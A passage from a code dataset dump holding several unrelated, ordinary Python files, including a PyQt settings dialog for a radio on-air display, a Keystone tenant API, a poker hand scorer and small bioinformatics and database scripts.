self.setupUi(self)\n 
self._connectSlots()\n self.hide()\n # create settings object for use with OAC\n self.settings = OASSettings()\n self.oacmode = oacmode\n\n # read the config, add missing values, save config and re-read config\n self.restoreSettingsFromConfig()\n self.sigConfigFinished.emit()\n\n # set version string\n self.versionLabel.setText(\"Version %s\" % versionString)\n\n def showsettings(self):\n self.show()\n\n def closeEvent(self, event):\n #emit config finished signal\n self.sigConfigFinished.emit()\n\n def exitOnAirScreen(self):\n if self.oacmode == False:\n #emit app close signal\n self.sigExitOAS.emit()\n else:\n self.sigExitRemoteOAS.emit(self.row)\n\n def rebootHost(self):\n if self.oacmode == False:\n #emit reboot host signal\n self.sigRebootHost.emit()\n else:\n self.sigRebootRemoteHost.emit(self.row)\n\n def shutdownHost(self):\n if self.oacmode == False:\n #emit shutdown host signal\n self.sigShutdownHost.emit()\n else:\n self.sigShutdownRemoteHost.emit(self.row)\n\n def _connectSlots(self):\n self.connect(self.ApplyButton, SIGNAL(\"clicked()\"), self.applySettings )\n self.connect(self.CloseButton, SIGNAL(\"clicked()\"), self.closeSettings )\n self.connect(self.ExitButton, SIGNAL(\"clicked()\"), self.exitOnAirScreen )\n self.connect(self.RebootButton, SIGNAL(\"clicked()\"), self.rebootHost )\n self.connect(self.ShutdownButton, SIGNAL(\"clicked()\"), self.shutdownHost )\n self.connect(self.LEDInactiveBGColor, SIGNAL(\"clicked()\"), self.setLEDInactiveBGColor )\n self.connect(self.LEDInactiveFGColor, SIGNAL(\"clicked()\"), self.setLEDInactiveFGColor )\n self.connect(self.LED1BGColor, SIGNAL(\"clicked()\"), self.setLED1BGColor )\n self.connect(self.LED1FGColor, SIGNAL(\"clicked()\"), self.setLED1FGColor )\n self.connect(self.LED2BGColor, SIGNAL(\"clicked()\"), self.setLED2BGColor )\n self.connect(self.LED2FGColor, SIGNAL(\"clicked()\"), self.setLED2FGColor )\n self.connect(self.LED3BGColor, SIGNAL(\"clicked()\"), self.setLED3BGColor )\n self.connect(self.LED3FGColor, SIGNAL(\"clicked()\"), self.setLED3FGColor )\n self.connect(self.LED4BGColor, SIGNAL(\"clicked()\"), self.setLED4BGColor )\n self.connect(self.LED4FGColor, SIGNAL(\"clicked()\"), self.setLED4FGColor )\n\n self.connect(self.DigitalHourColorButton, SIGNAL(\"clicked()\"), self.setDigitalHourColor )\n self.connect(self.DigitalSecondColorButton, SIGNAL(\"clicked()\"), self.setDigitalSecondColor )\n self.connect(self.DigitalDigitColorButton, SIGNAL(\"clicked()\"), self.setDigitalDigitColor )\n self.connect(self.logoButton, SIGNAL(\"clicked()\"), self.openLogoPathSelector )\n self.connect(self.resetLogoButton, SIGNAL(\"clicked()\"), self.resetLogo )\n\n self.connect(self.StationNameColor, SIGNAL(\"clicked()\"), self.setStationNameColor )\n self.connect(self.SloganColor, SIGNAL(\"clicked()\"), self.setSloganColor )\n\n self.connect(self, SIGNAL(\"triggered()\"), self.closeEvent )\n\n # special OAS Settings from OAC functions\n\n def readConfigFromJson(self, row, config):\n #remember which row we are\n self.row = row\n confdict = json.loads(unicode(config))\n for group, content in confdict.items():\n self.settings.beginGroup(group)\n for key, value in content.items():\n self.settings.setValue(key, value)\n self.settings.endGroup()\n self.restoreSettingsFromConfig()\n\n def readJsonFromConfig(self):\n #return json representation of config\n return json.dumps(self.settings.config)\n\n def restoreSettingsFromConfig(self):\n if self.oacmode == True:\n settings = self.settings\n else:\n settings = QSettings( QSettings.UserScope, 
\"astrastudio\", \"OnAirScreen\")\n\n settings.beginGroup(\"General\")\n self.StationName.setText(settings.value('stationname', 'Radio Eriwan').toString())\n self.Slogan.setText(settings.value('slogan', 'Your question is our motivation').toString())\n self.setStationNameColor(self.getColorFromName(settings.value('stationcolor', '#FFAA00').toString()))\n self.setSloganColor(self.getColorFromName(settings.value('slogancolor', '#FFAA00').toString()))\n settings.endGroup()\n\n settings.beginGroup(\"NTP\")\n self.checkBox_NTPCheck.setChecked(settings.value('ntpcheck', True).toBool())\n self.NTPCheckServer.setText(settings.value('ntpcheckserver', 'pool.ntp.org').toString())\n settings.endGroup()\n\n settings.beginGroup(\"LEDS\")\n self.setLEDInactiveBGColor(self.getColorFromName(settings.value('inactivebgcolor', '#222222').toString()))\n self.setLEDInactiveFGColor(self.getColorFromName(settings.value('inactivetextcolor', '#555555').toString()))\n settings.endGroup()\n\n settings.beginGroup(\"LED1\")\n self.LED1.setChecked(settings.value('used', True).toBool())\n self.LED1Text.setText(settings.value('text', 'ON AIR').toString())\n self.setLED1BGColor(self.getColorFromName(settings.value('activebgcolor', '#FF0000').toString()))\n self.setLED1FGColor(self.getColorFromName(settings.value('activetextcolor', '#FFFFFF').toString()))\n self.LED1Autoflash.setChecked(settings.value('autoflash', False).toBool())\n self.LED1Timedflash.setChecked(settings.value('timedflash', False).toBool())\n settings.endGroup()\n\n settings.beginGroup(\"LED2\")\n self.LED2.setChecked(settings.value('used', True).toBool())\n self.LED2Text.setText(settings.value('text', 'PHONE').toString())\n self.setLED2BGColor(self.getColorFromName(settings.value('activebgcolor', '#DCDC00').toString()))\n self.setLED2FGColor(self.getColorFromName(settings.value('activetextcolor', '#FFFFFF').toString()))\n self.LED2Autoflash.setChecked(settings.value('autoflash', False).toBool())\n self.LED2Timedflash.setChecked(settings.value('timedflash', False).toBool())\n settings.endGroup()\n\n settings.beginGroup(\"LED3\")\n self.LED3.setChecked(settings.value('used', True).toBool())\n self.LED3Text.setText(settings.value('text', 'DOORBELL').toString())\n self.setLED3BGColor(self.getColorFromName(settings.value('activebgcolor', '#00C8C8').toString()))\n self.setLED3FGColor(self.getColorFromName(settings.value('activetextcolor', '#FFFFFF').toString()))\n self.LED3Autoflash.setChecked(settings.value('autoflash', False).toBool())\n self.LED3Timedflash.setChecked(settings.value('timedflash', False).toBool())\n settings.endGroup()\n\n settings.beginGroup(\"LED4\")\n self.LED4.setChecked(settings.value('used', True).toBool())\n self.LED4Text.setText(settings.value('text', 'ARI').toString())\n self.setLED4BGColor(self.getColorFromName(settings.value('activebgcolor', '#FF00FF').toString()))\n self.setLED4FGColor(self.getColorFromName(settings.value('activetextcolor', '#FFFFFF').toString()))\n self.LED4Autoflash.setChecked(settings.value('autoflash', False).toBool())\n self.LED4Timedflash.setChecked(settings.value('timedflash', False).toBool())\n settings.endGroup()\n\n settings.beginGroup(\"Clock\")\n self.clockDigital.setChecked(settings.value('digital', True).toBool())\n self.clockAnalog.setChecked(not settings.value('digital', True).toBool())\n self.setDigitalHourColor(self.getColorFromName(settings.value('digitalhourcolor', '#3232FF').toString()))\n self.setDigitalSecondColor(self.getColorFromName(settings.value('digitalsecondcolor', 
'#FF9900').toString()))\n self.setDigitalDigitColor(self.getColorFromName(settings.value('digitaldigitcolor', '#3232FF').toString()))\n self.logoPath.setText(settings.value('logopath', ':/astrastudio_logo/images/astrastudio_transparent.png').toString())\n settings.endGroup()\n\n settings.beginGroup(\"Network\")\n self.udpport.setText(settings.value('udpport', '3310').toString())\n self.tcpport.setText(settings.value('tcpport', '3310').toString())\n settings.endGroup()\n\n def getSettingsFromDialog(self):\n if self.oacmode == True:\n settings = self.settings\n else:\n settings = QSettings( QSettings.UserScope, \"astrastudio\", \"OnAirScreen\")\n\n settings.beginGroup(\"General\")\n settings.setValue('stationname', self.StationName.displayText())\n settings.setValue('slogan', self.Slogan.displayText())\n settings.setValue('stationcolor', self.getStationNameColor().name())\n settings.setValue('slogancolor', self.getSloganColor().name())\n settings.endGroup()\n\n settings.beginGroup(\"NTP\")\n settings.setValue('ntpcheck', self.checkBox_NTPCheck.isChecked())\n settings.setValue('ntpcheckserver', self.NTPCheckServer.displayText())\n settings.endGroup()\n\n settings.beginGroup(\"LEDS\")\n settings.setValue('inactivebgcolor', self.getLEDInactiveBGColor().name())\n settings.setValue('inactivetextcolor', self.getLEDInactiveFGColor().name())\n settings.endGroup()\n\n settings.beginGroup(\"LED1\")\n settings.setValue('used', self.LED1.isChecked())\n settings.setValue('text', self.LED1Text.displayText())\n settings.setValue('activebgcolor', self.getLED1BGColor().name())\n settings.setValue('activetextcolor', self.getLED1FGColor().name())\n settings.setValue('autoflash', self.LED1Autoflash.isChecked())\n settings.setValue('timedflash', self.LED1Timedflash.isChecked())\n settings.endGroup()\n\n settings.beginGroup(\"LED2\")\n settings.setValue('used', self.LED2.isChecked())\n settings.setValue('text', self.LED2Text.displayText())\n settings.setValue('activebgcolor', self.getLED2BGColor().name())\n settings.setValue('activetextcolor', self.getLED2FGColor().name())\n settings.setValue('autoflash', self.LED2Autoflash.isChecked())\n settings.setValue('timedflash', self.LED2Timedflash.isChecked())\n settings.endGroup()\n\n settings.beginGroup(\"LED3\")\n settings.setValue('used', self.LED3.isChecked())\n settings.setValue('text', self.LED3Text.displayText())\n settings.setValue('activebgcolor', self.getLED3BGColor().name())\n settings.setValue('activetextcolor', self.getLED3FGColor().name())\n settings.setValue('autoflash', self.LED3Autoflash.isChecked())\n settings.setValue('timedflash', self.LED3Timedflash.isChecked())\n settings.endGroup()\n\n settings.beginGroup(\"LED4\")\n settings.setValue('used', self.LED4.isChecked())\n settings.setValue('text', self.LED4Text.displayText())\n settings.setValue('activebgcolor', self.getLED4BGColor().name())\n settings.setValue('activetextcolor', self.getLED4FGColor().name())\n settings.setValue('autoflash', self.LED4Autoflash.isChecked())\n settings.setValue('timedflash', self.LED4Timedflash.isChecked())\n settings.endGroup()\n\n settings.beginGroup(\"Clock\")\n settings.setValue('digital', self.clockDigital.isChecked())\n settings.setValue('digitalhourcolor', self.getDigitalHourColor().name())\n settings.setValue('digitalsecondcolor', self.getDigitalSecondColor().name())\n settings.setValue('digitaldigitcolor', self.getDigitalDigitColor().name())\n settings.setValue('logopath', self.logoPath.text())\n settings.endGroup()\n\n settings.beginGroup(\"Network\")\n 
settings.setValue('udpport', self.udpport.displayText())\n settings.setValue('tcpport', self.tcpport.displayText())\n settings.endGroup()\n\n if self.oacmode == True:\n # send oac a signal the the config has changed\n self.sigConfigChanged.emit(self.row, self.readJsonFromConfig())\n\n\n def applySettings(self):\n #apply settings button pressed\n self.getSettingsFromDialog()\n self.sigConfigFinished.emit()\n\n def closeSettings(self):\n #close settings button pressed\n self.restoreSettingsFromConfig()\n\n def setLED1BGColor(self, newcolor=False):\n palette = self.LED1Text.palette()\n oldcolor = palette.base().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Base, newcolor)\n self.LED1Text.setPalette(palette)\n\n def setLEDInactiveBGColor(self, newcolor=False):\n palette = self.LEDInactive.palette()\n oldcolor = palette.base().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Base, newcolor)\n self.LEDInactive.setPalette(palette)\n\n def setLEDInactiveFGColor(self, newcolor=False):\n palette = self.LEDInactive.palette()\n oldcolor = palette.text().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Text, newcolor)\n self.LEDInactive.setPalette(palette)\n\n def setLED1FGColor(self, newcolor=False):\n palette = self.LED1Text.palette()\n oldcolor = palette.text().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Text, newcolor)\n self.LED1Text.setPalette(palette)\n\n def setLED2BGColor(self, newcolor=False):\n palette = self.LED2Text.palette()\n oldcolor = palette.base().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Base, newcolor)\n self.LED2Text.setPalette(palette)\n\n def setLED2FGColor(self, newcolor=False):\n palette = self.LED2Text.palette()\n oldcolor = palette.text().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Text, newcolor)\n self.LED2Text.setPalette(palette)\n\n def setLED3BGColor(self, newcolor=False):\n palette = self.LED3Text.palette()\n oldcolor = palette.base().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Base, newcolor)\n self.LED3Text.setPalette(palette)\n\n def setLED3FGColor(self, newcolor=False):\n palette = self.LED3Text.palette()\n oldcolor = palette.text().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Text, newcolor)\n self.LED3Text.setPalette(palette)\n\n def setLED4BGColor(self, newcolor=False):\n palette = self.LED4Text.palette()\n oldcolor = palette.base().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Base, newcolor)\n self.LED4Text.setPalette(palette)\n\n def setLED4FGColor(self, newcolor=False):\n palette = self.LED4Text.palette()\n oldcolor = palette.text().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Text, newcolor)\n self.LED4Text.setPalette(palette)\n\n def setStationNameColor(self, newcolor=False):\n palette = self.StationName.palette()\n oldcolor = palette.text().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Text, newcolor)\n self.StationName.setPalette(palette)\n\n def setSloganColor(self, newcolor=False):\n palette = self.Slogan.palette()\n oldcolor = palette.text().color()\n 
if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Text, newcolor)\n self.Slogan.setPalette(palette)\n\n def getStationNameColor(self):\n palette = self.StationName.palette()\n color = palette.text().color()\n return color\n\n def getSloganColor(self):\n palette = self.Slogan.palette()\n color = palette.text().color()\n return color\n\n def getLEDInactiveBGColor(self):\n palette = self.LEDInactive.palette()\n color = palette.base().color()\n return color\n\n def getLEDInactiveFGColor(self):\n palette = self.LEDInactive.palette()\n color = palette.text().color()\n return color\n\n def getLED1BGColor(self):\n palette = self.LED1Text.palette()\n color = palette.base().color()\n return color\n\n def getLED2BGColor(self):\n palette = self.LED2Text.palette()\n color = palette.base().color()\n return color\n\n def getLED3BGColor(self):\n palette = self.LED3Text.palette()\n color = palette.base().color()\n return color\n\n def getLED4BGColor(self):\n palette = self.LED4Text.palette()\n color = palette.base().color()\n return color\n\n def getLED1FGColor(self):\n palette = self.LED1Text.palette()\n color = palette.text().color()\n return color\n\n def getLED2FGColor(self):\n palette = self.LED2Text.palette()\n color = palette.text().color()\n return color\n\n def getLED3FGColor(self):\n palette = self.LED3Text.palette()\n color = palette.text().color()\n return color\n\n def getLED4FGColor(self):\n palette = self.LED4Text.palette()\n color = palette.text().color()\n return color\n\n def getDigitalHourColor(self):\n palette = self.DigitalHourColor.palette()\n color = palette.window().color()\n return color\n\n def getDigitalSecondColor(self):\n palette = self.DigitalSecondColor.palette()\n color = palette.window().color()\n return color\n\n def getDigitalDigitColor(self):\n palette = self.DigitalDigitColor.palette()\n color = palette.window().color()\n return color\n\n def setDigitalHourColor(self, newcolor=False):\n palette = self.DigitalHourColor.palette()\n oldcolor = palette.window().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Window, newcolor)\n self.DigitalHourColor.setPalette(palette)\n\n def setDigitalSecondColor(self, newcolor=False):\n palette = self.DigitalSecondColor.palette()\n oldcolor = palette.window().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Window, newcolor)\n self.DigitalSecondColor.setPalette(palette)\n\n def setDigitalDigitColor(self, newcolor=False):\n palette = self.DigitalDigitColor.palette()\n oldcolor = palette.window().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Window, newcolor)\n self.DigitalDigitColor.setPalette(palette)\n\n def openColorDialog(self, initcolor):\n colordialog = QColorDialog()\n selectedcolor = colordialog.getColor(initcolor, None, 'Please select a color')\n if selectedcolor.isValid():\n return selectedcolor\n else:\n return initcolor\n\n def getColorFromName(self, colorname):\n color = QColor()\n color.setNamedColor( colorname )\n return color\n\n def openLogoPathSelector(self):\n filename = QFileDialog.getOpenFileName(self, \"Open File\", \"\", \"Image Files (*.png)\" )\n if filename:\n self.logoPath.setText(filename)\n\n def resetLogo(self):\n self.logoPath.setText(\":/astrastudio_logo/images/astrastudio_transparent.png\")\n\n def setLogoPath(self, path):\n 
self.logoPath.setText(path)\n","sub_path":"settings_functions.py","file_name":"settings_functions.py","file_ext":"py","file_size_in_byte":23079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"337822219","text":"import asyncio\nfrom typing import Any, Coroutine\n\nfrom ..types.slack.response import APIResponse\n\n\nasync def retry(coro: Coroutine[Any, Any, APIResponse]) -> APIResponse:\n    sleep = 1\n    while True:\n        resp = await coro\n        if isinstance(resp.body, dict) and resp.body['ok']:\n            return resp\n        if sleep > 16:\n            return resp\n        if resp.status == 429:\n            seconds = int(resp.headers['Retry-After']) + 0.5\n            await asyncio.sleep(seconds)\n        else:\n            await asyncio.sleep(sleep)\n            sleep += 1\n","sub_path":"yui/utils/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"440503053","text":"#!/usr/bin/python\n\"\"\" checks to see if srvy.db exists in ../archive. If not it creates the db and appropriate table \"\"\"\n\nimport sqlite3\nfrom sqlite3 import Error\n\ndef create_conection(db_file):\n    try:\n        conn = sqlite3.connect(db_file)\n        print(sqlite3.version)\n    except Error as e:\n        print(e)\n    finally:\n        conn.close()\n\ndef create_table(db_file,create_table_sql):\n    try:\n        conn = sqlite3.connect(db_file)\n        c = conn.cursor()\n        c.execute(create_table_sql)\n    except Error as e:\n        print(e)\n    finally:\n        conn.close()\n\ndef main():\n    database = \"../archive/srvy.db\"\n    create_conection(database)\n    create_srvy_table = \"\"\" CREATE TABLE IF NOT EXISTS responses (response_key INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n                                                                  pythonDateTime TEXT NOT NULL,\n                                                                  unixTime REAL NOT NULL,\n                                                                  question TEXT NOT NULL,\n                                                                  opinion INTEGER NOT NULL\n                                                                  );\"\"\"\n    create_table(database, create_srvy_table)\n\nmain()\n","sub_path":"collection/setup_db.py","file_name":"setup_db.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"267551621","text":"import pandas as pd\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\n\n\n\n\nclass MCTracksData:\n    def __init__(self, fname, lats_fname, lons_fname):\n        self.src_fname = fname\n        self.read_MCtracks_data()\n        self.lats = np.squeeze(np.load(lats_fname))\n        self.lons = np.squeeze(np.load(lons_fname))\n        y = np.arange(0, self.lats.shape[0], 1)\n        x = np.arange(0, self.lats.shape[1], 1)\n        self.xmesh, self.ymesh = np.meshgrid(x, y)\n\n    def read_MCtracks_data(self):\n        TracksData = pd.read_csv(self.src_fname, sep=';', decimal='.',\n                                 dtype={'Synop':np.uint8,\n                                        'ClType':np.uint8,\n                                        'McID':np.short,\n                                        'DateTime':str,\n                                        'Lon':float,\n                                        'Lat':float,\n                                        'Diameter':float})\n        TracksData['dt'] = pd.to_datetime(TracksData.DateTime, format='%Y%m%d%H')\n        self.tracks_data = TracksData[TracksData.Diameter > 0.]\n\n    def get_mc_data(self, dt):\n        cur_datetime_mcs = self.tracks_data[self.tracks_data.dt == dt]\n\n        cur_snapshot_mcs_bboxes = []\n        targetlabels_images = []\n\n        for idx, cur_mc in cur_datetime_mcs.iterrows():\n            dLats = self.lats - cur_mc.Lat\n            dlons = self.lons - cur_mc.Lon\n            rsqr = np.square(dLats) + np.square(dlons)\n            minrsqr_idx = np.unravel_index(np.argmin(rsqr), rsqr.shape)\n            xy_dist_sqr = np.square(self.xmesh - minrsqr_idx[1]) + np.square(self.ymesh - minrsqr_idx[0])\n            km_dist_sqr = xy_dist_sqr * 25.\n\n            #region debug_plot\n            # f = plt.figure(figsize=(4,4), dpi=300)\n            # plt.imshow(km_dist_sqr, cmap='jet')\n            # plt.show()\n 
#endregion debug_plot\n\n diameter_sqr = cur_mc.Diameter ** 2\n cur_target = (km_dist_sqr <= diameter_sqr).astype(np.uint8)\n\n # region debug_plot\n # f = plt.figure(figsize=(4, 4), dpi=300)\n # plt.imshow(cur_target, cmap='gray')\n # plt.show()\n # endregion debug_plot\n\n x,y,w,h = cv2.boundingRect(cur_target)\n targetlabels_images.append(cur_target)\n #convert to X1Y1X2Y2 format\n x1,y1,x2,y2 = (x, y, x+w, y+h)\n cur_snapshot_mcs_bboxes.append(np.array([x1,y1,x2,y2])[np.newaxis,:])\n cur_snapshot_mcs_bboxes = np.concatenate(cur_snapshot_mcs_bboxes, axis=0)\n return cur_snapshot_mcs_bboxes, targetlabels_images","sub_path":"utils/read_tracks_data.py","file_name":"read_tracks_data.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"598569685","text":"import json\n\nfrom falcon import before, HTTP_200, HTTP_201, HTTP_204, HTTPNotFound\n\nfrom service.resources import BaseResource, validate\nfrom service.schema import load_schema\nfrom service.requester import request, request_post_patch\n\nfrom service.authz.policy import enforce\nfrom service.conf_reader import ConfReader\n\n\ndef validate_id(req, resp, tenant_id):\n \"\"\"\n Validate if the id is on the endpoint\n \"\"\"\n if not tenant_id:\n raise HTTPNotFound()\n\n\nclass TenantAPI(BaseResource):\n \"\"\"\n API that allows tenant management. This API exposes an Option, GET, POST, PATCH and DELETE Methods. This converts\n Keystone Domain objects into simple Tenant objects. All methods translate keystone URI to internal URI.\n \"\"\"\n\n KS_ENDPOINT = ConfReader().get('keystone', 'url') + '/domains'\n\n ROUTES = [\n 'tenants/',\n 'tenants',\n 'tenants/{tenant_id}',\n 'tenants/{tenant_id}/'\n ]\n\n SERVICE_NAME = 'Tenant'\n\n @staticmethod\n def convert_domain_tenant(req, specific=True, r=None, domain=None):\n \"\"\"\n Converts a Keystone Object in a tenant object. Corrects the links and removes the domain keyword.\n :param req: The request object to set the result\n :param specific: The original search was performed for a specific tenant\n :param r: The original request object to keystone with the response. If provided the data is\n loaded from the object.\n :param domain: The domain to convert. If provided the data is the object itself.\n :return: The tenant object\n \"\"\"\n if r:\n data = json.loads(r.text)\n tenant = data['domain']\n else:\n tenant = domain\n\n tenant['links']['self'] = req.uri if specific else req.uri + '/' + tenant['id']\n return tenant\n\n def on_options(self, req, resp, **kargs):\n \"\"\"\n OPTIONS method for the Tenant API\n :return:\n 204 No Content - Header with the allow and all HTTP methods available\n \"\"\"\n if kargs:\n resp.set_header('Allow', 'DELETE, GET, OPTIONS, PATCH')\n else:\n resp.set_header('Allow', 'GET, OPTIONS, POST')\n resp.status = HTTP_204\n\n @enforce(SERVICE_NAME, 'default')\n def on_get(self, req, resp, **kwargs):\n \"\"\"\n List tenants. This method processes the HTTP get request for this API.\n If the tenant_id is provided the specific get tenant method is called,\n otherwise the get all tenants method is retrieved.\n \"\"\"\n if kwargs:\n self.get_specific_tenant(req, resp, kwargs.get('tenant_id', None))\n else:\n self.get_all_tenants(req, resp)\n\n def get_all_tenants(self, req, resp):\n \"\"\"\n Method to retrieve all tenants from the identity service. 
 This endpoint is only accessible to Super Admin users.\n        :return:\n            200 OK - When all tenants are retrieved with success\n        \"\"\"\n        r = request(\n            TenantAPI.KS_ENDPOINT,\n            headers={'X-Auth-Token': req.headers['X-AUTH-TOKEN']},\n            service_name=TenantAPI.SERVICE_NAME\n        )\n        data = json.loads(r.text)\n\n        # Convert object\n        tenants = data.get('domains', None)\n        tenants = list(map(lambda domain: self.convert_domain_tenant(req, specific=False, domain=domain), tenants))\n        links = data.get('links', None)\n        links[\"self\"] = req.uri\n\n        resp.body = self.format_body(dict(tenants=tenants, links=links), from_dict=True)\n\n    def get_specific_tenant(self, req, resp, tenant_id):\n        \"\"\"\n        Method to retrieve a single tenant. This endpoint is accessible to a Tenant Admin,\n        who can only query its own tenant, and to the Super Admin.\n        :param tenant_id: Tenant ID to retrieve\n        :return:\n            200 OK - When the tenant is found and successfully retrieved\n        \"\"\"\n        # Configure correct endpoint\n        endpoint = TenantAPI.KS_ENDPOINT + '/' + tenant_id\n\n        # Request the tenant\n        r = request(\n            endpoint,\n            headers={'X-Auth-Token': req.headers['X-AUTH-TOKEN']},\n            service_name=TenantAPI.SERVICE_NAME\n        )\n        tenant = TenantAPI.convert_domain_tenant(req, r=r)\n        resp.body = self.format_body(dict(tenant=tenant), from_dict=True)\n        resp.status = HTTP_200\n\n    @enforce(SERVICE_NAME, 'default')\n    @validate(load_schema('tenant'))\n    def on_post(self, req, resp, parsed):\n        \"\"\"\n        Method to create a new tenant. This endpoint is accessible to the Super Admin only.\n        The name of each tenant must be unique.\n        :return:\n            201 Created - When the tenant is successfully created\n        \"\"\"\n        data = parsed.get('tenant')\n\n        # Build KS Request\n        enabled = True # By default a domain is enabled\n        ks_domain = dict(name=data.get('name'), enabled=enabled, description=data.get('description'))\n\n        # Process request\n        r = request_post_patch(\n            TenantAPI.KS_ENDPOINT, method='POST',\n            headers={'Content-Type': 'application/json', 'X-Auth-Token': req.headers['X-AUTH-TOKEN']},\n            json=dict(domain=ks_domain),\n            service_name=TenantAPI.SERVICE_NAME\n        )\n\n        tenant = TenantAPI.convert_domain_tenant(req, r=r)\n        resp.body = self.format_body(dict(tenant=tenant), from_dict=True)\n        resp.status = HTTP_201\n\n    @validate(load_schema('tenant_update'))\n    @enforce(SERVICE_NAME, 'default')\n    def on_patch(self, req, resp, tenant_id, parsed):\n        \"\"\"\n        Method to update a Tenant. This endpoint is only accessible to the Super Admin.\n        The full object is not required; only the updated fields need to be sent.\n        :param tenant_id: The tenant id to edit\n        :return:\n            200 OK - When the tenant is edited successfully\n        \"\"\"\n        # Configure correct endpoint\n        endpoint = TenantAPI.KS_ENDPOINT + '/' + tenant_id\n\n        data = parsed.get('tenant')\n\n        r = request_post_patch(\n            endpoint, method='PATCH',\n            headers={'Content-Type': 'application/json', 'X-Auth-Token': req.headers['X-AUTH-TOKEN']},\n            json=dict(domain=data),\n            service_name=TenantAPI.SERVICE_NAME\n        )\n\n        tenant = TenantAPI.convert_domain_tenant(req, r=r)\n        resp.body = self.format_body(dict(tenant=tenant), from_dict=True)\n        resp.status = HTTP_200\n\n    @before(validate_id)\n    @enforce(SERVICE_NAME, 'default')\n    def on_delete(self, req, resp, tenant_id):\n        \"\"\"\n        Method to delete a Tenant.
 This endpoint is only accessible to the Super Admin.\n        Before deleting the tenant, the method ensures the tenant is disabled.\n        :param tenant_id: The tenant id to delete\n        :return:\n            204 No Content - When the tenant is successfully deleted\n        \"\"\"\n        # Configure correct endpoint\n        endpoint = TenantAPI.KS_ENDPOINT + '/' + tenant_id\n\n        # Ensure the tenant is disabled\n        ks_domain = dict(enabled=False)\n        request_post_patch(\n            endpoint, 'PATCH',\n            headers={'Content-Type': 'application/json', 'X-Auth-Token': req.headers['X-AUTH-TOKEN']},\n            json=dict(domain=ks_domain),\n            service_name=TenantAPI.SERVICE_NAME\n        )\n        request(\n            endpoint, method='DELETE',\n            headers={'Content-Type': 'application/json', 'X-Auth-Token': req.headers['X-AUTH-TOKEN']},\n            service_name=TenantAPI.SERVICE_NAME\n        )\n        resp.status = HTTP_204\n","sub_path":"IdentityService/service/resources/tenant.py","file_name":"tenant.py","file_ext":"py","file_size_in_byte":7565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"176225639","text":"import math\nimport constants as C\n\n\nclass ChenScore(object):\n    \"\"\" Scores a hand according to the Chen formula.\n    See:\n    www.thepokerbank.com/strategy/basic/starting-hand-selection/chen-formula\n    \"\"\"\n    CARD_TO_POINTS = {C.ACE: 10, C.KING: 8, C.QUEEN: 7, C.JACK: 6}\n    GAP_MINUS_POINTS = {1: -1, 2: -2, 3: -4}\n\n    def __init__(self, hand):\n        self.hand = hand\n\n    def score(self):\n        \"\"\"Scores a hand based on the Chen system\"\"\"\n        points = self.points_for_card(self.hand.high)\n\n        # For a pair, return double the high card's value\n        if self.hand.is_pair():\n            return max(points * 2, 5)\n\n        # Add two points if the cards are suited\n        if self.hand.is_suited():\n            points = points + 2\n\n        # Subtract points if there is a gap between the two cards\n        if not self.hand.is_connected():\n            gap_penalty = self.GAP_MINUS_POINTS.get(self.hand.card_gap())\n            if not gap_penalty:\n                gap_penalty = -5\n\n            points = points + gap_penalty\n\n        # Add 1 point if there is a 0 or 1 card gap and both cards < Q\n        # (parenthesised so the gap check is ANDed with the < Q check)\n        if self.hand.high.value < C.QUEEN and \\\n           (self.hand.is_connected() or self.hand.card_gap() == 1):\n            points = points + 1\n\n        return math.ceil(points)\n\n    def points_for_card(self, card):\n        points = self.CARD_TO_POINTS.get(card.value)\n        if not points:\n            points = card.value * 0.5\n        return points\n","sub_path":"pokeher/chen.py","file_name":"chen.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"600381074","text":"fin = open('C:\\\\Users\\\\Ani\\\\Downloads\\\\rosalind_revp.txt', 'r')\r\nfout = open('C:\\\\Users\\\\Ani\\\\OneDrive\\\\Desktop\\\\output.txt', 'w')\r\ntext = fin.readlines()\r\ndna = ''\r\nfor i in text[1:]:\r\n    dna += i.replace(\"\\n\",\"\")\r\ndef reverse_palindrome(text):\r\n    # collect every (position, length) pair; a dict keyed by position\r\n    # would overwrite palindromes that start at the same index\r\n    results = []\r\n    for i in range(4,13):\r\n        for j in range(len(text)-i+1):\r\n            pattern = text[j:j+i]\r\n            reverse_pattern = \"\".join(([{'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A'}[l]\r\n                                        for l in list(pattern)])[::-1])\r\n            if pattern == reverse_pattern:\r\n                results.append((j+1, len(pattern)))\r\n    return results\r\n\r\nresult = 